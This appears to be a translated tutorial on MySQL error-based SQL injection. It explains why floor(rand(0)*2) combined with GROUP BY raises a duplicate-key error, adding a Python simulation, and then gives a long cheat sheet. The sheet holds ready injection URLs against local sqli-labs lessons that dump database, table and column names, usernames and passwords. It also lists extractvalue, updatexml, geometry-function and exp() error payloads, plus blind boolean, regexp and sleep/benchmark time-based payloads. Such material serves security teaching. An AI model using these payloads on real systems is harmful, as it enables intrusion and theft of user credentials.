5. Combine the rand() function from before with floor()

6. The queried name is too long, so give it an alias
7. Query again: how many tables information_schema.tables has, i.e. how many rows it displays

8. group by groups the result according to the rule we want
9. count() counts the number of elements
10. Repeat this a few more times
0x02: rand() and rand(0)
1. From the results above, without a random seed the error appears after 2 executions; now we add a seed
Look at the result:
An error occurs every time. Does this mean that a statement containing floor(rand(0)*2) plus the other conditions always errors?
Let's verify. First create a table test and insert only one record:
Then run the error statement:
Executed many times, no error appears
Add another record:
Continue running the error statement:
Still no error after many executions
Add one more record:
Test the error statement:
The error appears
This proves that the floor(rand(0)*2) error is conditional: the table must contain at least 3 records, and with 3 or more records it always errors
0x03 Determinism and non-determinism
From the verification above we find:
floor(rand()*2): with two records the error is random
floor(rand(0)*2): with three or more records the error is certain
We can therefore guess that floor(rand()*2) is fairly random, with no deterministic element, while floor(rand(0)*2) is deterministic in some respect
floor(rand(0)*2): the error is caused precisely by its determinism
Run each and observe:
floor(rand()*2):
Three consecutive queries show no pattern at all
floor(rand(0)*2):
Three consecutive queries show a pattern, and a fixed one; this is the determinism mentioned above that causes the error
0x04 The virtual table behind count and group by
First look at the query result:
We can see test5 has 3 records,
which matches the result of count(*). When MySQL encounters a statement like select count(*) from test group by name;
it first builds a virtual table:

But how does this cause an error?
0x05 The floor(rand(0)*2) error
The official MySQL documentation actually hints at this: if a query uses rand(), the value may be evaluated several times. With group by, floor(rand(0)*2) is executed once, and if the key does not yet exist in the virtual table it is executed a second time when the row is inserted into the virtual table. In 0x03 we found that floor(rand(0)*2) is deterministic, producing 01101100111011; the error is really caused by floor(rand(0)*2) being computed more than once. Look concretely at select count(*) from test group by floor(rand(0)*2);
1. Before the query runs, the virtual table is created
2. The first record is fetched and floor(rand(0)*2) is executed; the result is 0 (1st computation). The virtual table is checked and key 0 does not exist, so floor(rand(0)*2) is computed again; the result is 1 (2nd computation) and it is inserted into the virtual table. The first record is now processed:
3. The second record is fetched and floor(rand(0)*2) is computed again; the result is 1 (3rd computation). The virtual table is checked and key 1 exists (see the figure above), so floor(rand(0)*2) is not computed a second time; count(*) is simply incremented. The second record is now processed:
4. The third record is fetched and floor(rand(0)*2) is computed again; the result is 0 (4th computation). The virtual table is checked and key 0 does not exist, so the virtual table tries to insert a new row. During the insert floor(rand(0)*2) is computed once more; the result is 1 (5th computation). But the key 1 already exists in the virtual table and the newly computed value is also 1 (the key must be unique), so the insert fails with an error.
5. Over the whole query floor(rand(0)*2) is computed 5 times and 3 records are read. This is why the table needs 3 records, and this is why the statement errors
0x06 The floor(rand()*2) error
From 0x01 and 0x02 we found that floor(rand()*2) is random.
What matters most is that after the first few records are processed the virtual table must not already hold both keys 0 and 1; once it does, no number of records can trigger the error, because floor(rand()*2) is never again computed as a virtual-table key. That is why without a seed it sometimes errors and sometimes does not:
In that case, however many records are read, the key is not computed again; count(*) is simply incremented, so there is no error
For example floor(rand(1)*2):
After the first two records are processed, keys 0 and 1 already exist in the virtual table, so afterwards only count(*) is incremented and no error can occur
This is the principle and process of floor-type error-based injection
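As an added illustration (not code from the original post), the following Python reimplements MySQL's rand(N) generator (the my_rnd/randominit routines; the seeding formula seed1 = N*0x10001 + 55555555, seed2 = N*0x10000001 is assumed here) and models the GROUP BY virtual table exactly as 0x05 describes it, so the five evaluations on three rows and the rand(1) case from 0x06 can be checked without a database.

```python
import math

# Reimplementation of MySQL's my_rnd() linear congruential generator
# (assumed formula, not MySQL's own code); max_value is 0x3FFFFFFF.
MAX_VALUE = 0x3FFFFFFF


class MySQLRand:
    """The rand(N) stream MySQL produces for a constant seed N."""

    def __init__(self, seed):
        # randominit() seeding as done by Item_func_rand::seed_random (assumed)
        self.seed1 = ((seed * 0x10001 + 55555555) & 0xFFFFFFFF) % MAX_VALUE
        self.seed2 = ((seed * 0x10000001) & 0xFFFFFFFF) % MAX_VALUE
        self.evaluations = 0

    def next_float(self):
        self.seed1 = (self.seed1 * 3 + self.seed2) % MAX_VALUE
        self.seed2 = (self.seed1 + self.seed2 + 33) % MAX_VALUE
        self.evaluations += 1
        return self.seed1 / MAX_VALUE

    def floor_rand_2(self):
        return math.floor(self.next_float() * 2)


def rand_bits(seed, n):
    """First n values of floor(rand(seed)*2) as a string, e.g. '0110...'."""
    r = MySQLRand(seed)
    return "".join(str(r.floor_rand_2()) for _ in range(n))


def simulate_group_by(seed, rows):
    """Model 'select count(*) from t group by floor(rand(seed)*2)' over rows.

    Returns (error, evaluations, table): error is True when the virtual
    table's unique key is violated, the condition behind MySQL's
    'Duplicate entry ... for key group_key' error.
    """
    r = MySQLRand(seed)
    table = {}
    for _ in range(rows):
        key = r.floor_rand_2()      # computed once to look up the group
        if key in table:
            table[key] += 1         # existing group: just count(*)+1
            continue
        key = r.floor_rand_2()      # computed again when the row is inserted
        if key in table:
            return True, r.evaluations, table   # duplicate key -> error
        table[key] = 1
    return False, r.evaluations, table
```

simulate_group_by(0, 3) reports the error after exactly five evaluations, while simulate_group_by(1, n) never errors because rand(1) yields 0, 1, 0, 0 and both keys are inserted by the second row.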
--------------------------------------------------------------------------------

select schema_name from information_schema.schemata;

Dump all table names in the database:
select table_name from information_schema.tables;

select column_name from information_schema.columns where table_name='wp_users';

select table_name,table_schema from information_schema.tables group by table_schema;
select group_concat(0x3a,0x3a,database(),0x3a,0x3a,floor(rand()*2))name;
0x3a is the hex code for ':'
select count(*),concat(0x3a,0x3a,database(),0x3a,0x3a,floor(rand()*2))name from information_schema.tables group by name;

But this error message reveals the current database name, which is exactly what makes it useful for SQL injection; in the same way we can swap in different functions to obtain other information
select count(*),concat(0x3a,0x3a,version(),0x3a,0x3a,floor(rand()*2))name from information_schema.tables group by name;

select count(*),concat(0x3a,0x3a,(select table_name from information_schema.tables where table_schema=database() limit 0,1),0x3a,0x3a,floor(rand()*2))name from information_schema.tables group by name;
select * from table limit m,n

http://127.0.0.1/sqlilabs/Less-5/?id=-1' and (select 1 from (select count(*),concat(0x3a,0x3a,(select table_name from information_schema.tables where table_schema=database() limit 0,1),0x3a,0x3a,floor(rand()*2))name from information_schema.tables group by name)b)%2
http://127.0.0.1/sqlilabs/Less-5/?id=-1' and (select 1 from (select count(*),concat(0x3a,0x3a,(select column_name from information_schema.columns where table_name='users' limit 2,1),0x3a,0x3a,floor(rand()*2))name from information_schema.tables group by name)b)%23


http://127.0.0.1/sqlilabs/Less-5/?id=-1' and (select 1 from (select count(*),concat(0x3a,0x3a,(select username from users limit 2,1),0x3a,0x3a,floor(rand()*2))name from information_schema.tables group by name)b)%23
http://127.0.0.1/sqlilabs/Less-5/?id=-1' and (select 1 from (select count(*),concat(0x3a,0x3a,(select password from users limit 2,1),0x3a,0x3a,floor(rand()*2))name from information_schema.tables group by name)b)%23

1. Via the floor error, the injection statements are as follows:
Dump database: http://127.0.0.1/sqlilabs/Less-5/?id=-1' and (select 1 from (select count(*),concat(0x3a,0x3a,database(),0x3a,0x3a,floor(rand()*2))name from information_schema.tables group by name)b)%23
Dump tables: http://127.0.0.1/sqlilabs/Less-5/?id=-1' and (select 1 from (select count(*),concat(0x3a,0x3a,(select table_name from information_schema.tables where table_schema=database() limit 0,1),0x3a,0x3a,floor(rand()*2))name from information_schema.tables group by name)b)%23
Dump columns: http://127.0.0.1/sqlilabs/Less-5/?id=-1' and (select 1 from (select count(*),concat(0x3a,0x3a,(select column_name from information_schema.columns where table_name='users' limit 2,1),0x3a,0x3a,floor(rand()*2))name from information_schema.tables group by name)b)%23
Dump usernames: http://127.0.0.1/sqlilabs/Less-5/?id=-1' and (select 1 from (select count(*),concat(0x3a,0x3a,(select username from users limit 2,1),0x3a,0x3a,floor(rand()*2))name from information_schema.tables group by name)b)%23
Dump passwords: http://127.0.0.1/sqlilabs/Less-5/?id=-1' and (select 1 from (select count(*),concat(0x3a,0x3a,(select password from users limit 2,1),0x3a,0x3a,floor(rand()*2))name from information_schema.tables group by name)b)%23
2. Via the ExtractValue error, the injection statements are as follows:
Dump database: and extractvalue(1, concat(0x5c, (select database()),0x5c));
Dump tables: and extractvalue(1, concat(0x5c, (select table_name from information_schema.tables where table_schema=database() limit 0,1),0x5c));
Dump columns: and extractvalue(1, concat(0x5c, (select column_name from information_schema.columns where table_name='users' limit 0,1),0x5c));
Dump users: and extractvalue(1, concat(0x5c, (select username from users limit 0,1),0x5c));
Dump passwords: and extractvalue(1, concat(0x5c, (select password from users limit 0,1),0x5c));
3. Via the UpdateXml error, the injection statements are as follows:
Dump database: and 1=(updatexml(1,concat(0x3a,(select database()),0x3a),1))
Dump tables: and 1=(updatexml(1,concat(0x3a,(select table_name from information_schema.tables where table_schema=database() limit 0,1),0x3a),1))
Dump columns: and 1=(updatexml(1,concat(0x3a,(select column_name from information_schema.columns where table_name='users' limit 0,1),0x3a),1))
Dump users: and 1=(updatexml(1,concat(0x3a,(select username from users limit 0,1),0x3a),1))
Dump passwords: and 1=(updatexml(1,concat(0x3a,(select password from users limit 0,1),0x3a),1))
4. Via the geometrycollection() error, the injection statement is as follows:
select * from test where id=1 and geometrycollection((select * from(select * from(select user())a)b));
5. Via the multipoint() error, the injection statement is as follows:
select * from test where id=1 and multipoint((select * from(select * from(select user())a)b));
6. Via the polygon() error, the injection statement is as follows:
select * from test where id=1 and polygon((select * from(select * from(select user())a)b));
7. Via the multipolygon() error, the injection statement is as follows:
select * from test where id=1 and multipolygon((select * from(select * from(select user())a)b));
8. Via the linestring() error, the injection statement is as follows:
select * from test where id=1 and linestring((select * from(select * from(select user())a)b));
9. Via the multilinestring() error, the injection statement is as follows:
select * from test where id=1 and multilinestring((select * from(select * from(select user())a)b));
10. Via the exp() error, the injection statement is as follows:
select * from test where id=1 and exp(~(select * from(select user())a));
left(database(),1)>'s' // the left() function
ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1,1))=101 --+
ascii(substr((select database()),1,1))=98
ORD(MID((SELECT IFNULL(CAST(username AS CHAR),0x20)FROM security.users ORDER BY id LIMIT 0,1),1,1))>98%23
select user() regexp '^[a-z]';
select user() regexp '^ro'
select * from users where id=1 and 1=(if((user() regexp '^r'),1,0));
select * from users where id=1 and 1=(user() regexp'^ri');
select * from users where id=1 and 1=(select 1 from information_schema.tables where table_schema='security' and table_name regexp '^us[a-z]' limit 0,1);
table_name regexp '^username$'
If(ascii(substr(database(),1,1))>115,0,sleep(5))%23
select sleep(find_in_set(mid(@@version, 1, 1), '0,1,2,3,4,5,6,7,8, 9,.'));
UNION SELECT IF(SUBSTRING(current,1,1)=CHAR(119),BENCHMARK(5000000,ENCODE('MSG','by 5 seconds')),null) FROM (select database() as current) as tb1;
http://127.0.0.1/sqllib/Less-9/?id=1%27and%20If(ascii(substr(database(),1,1))=115,1,sleep(5))--+

http://127.0.0.1/sqllib/Less-9/?id=1%27and%20If(ascii(substr(database(),2,1))=101,1,sleep(5))--+

http://127.0.0.1/sqllib/Less-9/?id=1'and If(ascii(substr((select table_name from information_schema.tables where table_schema='security' limit 0,1),1,1))=101,1,sleep(5))--+
http://127.0.0.1/sqllib/Less-9/?id=1'and If(ascii(substr((select table_name from information_schema.tables where table_schema='security' limit 1,1),1,1))=114,1,sleep(5))--+
http://127.0.0.1/sqllib/Less-9/?id=1'and If(ascii(substr((select column_name from information_schema.columns where table_name='users' limit 0,1),1,1))=105,1,sleep(5))--+
http://127.0.0.1/sqllib/Less-9/?id=1'and If(ascii(substr((select username from users limit 0,1), 1,1))=68,1,sleep(5))--+